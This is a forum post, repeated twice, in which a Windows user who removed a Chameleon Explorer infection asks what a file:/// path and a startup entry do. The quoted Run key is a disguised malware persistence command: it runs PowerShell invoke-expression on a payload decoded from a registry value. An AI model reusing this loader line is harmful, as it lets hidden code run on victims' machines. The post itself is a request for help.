On my Win10 notebook I had to clear out an (Chameleon Explorer) infection - which after a bit of effort I was able to get fully rid of...
Along the way however I noticed some interesting code - namely,
file:///C:\PROGRA~3\ZVMIMC~1\ACTIVA~1.EXE
The instruction obviously ran the ACTIVA~1.EXE file (which I thankfully deleted along with a bunch of other crap that got loaded on my machine) but I'm interested in the command " file:/// " which I can't find any info on...
Just out of curiosity what exactly does that file/// code do ...?
Also - while I'm at it - in my Start Up there was the following,
HKCU:Run azropSvc Microsoft Corporation cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty '+ZAP+HKCU:\Software\AppDataLow\Software\Microsoft\B45C02DF-8360-060C-AD28-679A31DC8B6E').accorLib))
which I've also disabled, but I'm curious on what that is doing.
Appreciate any advice and info ...
Cheers, Glen
Along the way however I noticed some interesting code - namely,
file:///C:\PROGRA~3\ZVMIMC~1\ACTIVA~1.EXE
The instruction obviously ran the ACTIVA~1.EXE file (which I thankfully deleted along with a bunch of other crap that got loaded on my machine) but I'm interested in the command " file:/// " which I can't find any info on...
Just out of curiosity what exactly does that file/// code do ...?
Also - while I'm at it - in my Start Up there was the following,
HKCU:Run azropSvc Microsoft Corporation cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty '+ZAP+HKCU:\Software\AppDataLow\Software\Microsoft\B45C02DF-8360-060C-AD28-679A31DC8B6E').accorLib))
which I've also disabled, but I'm curious on what that is doing.
Appreciate any advice and info ...
Cheers, Glen
Facebook
Twitter
Instagram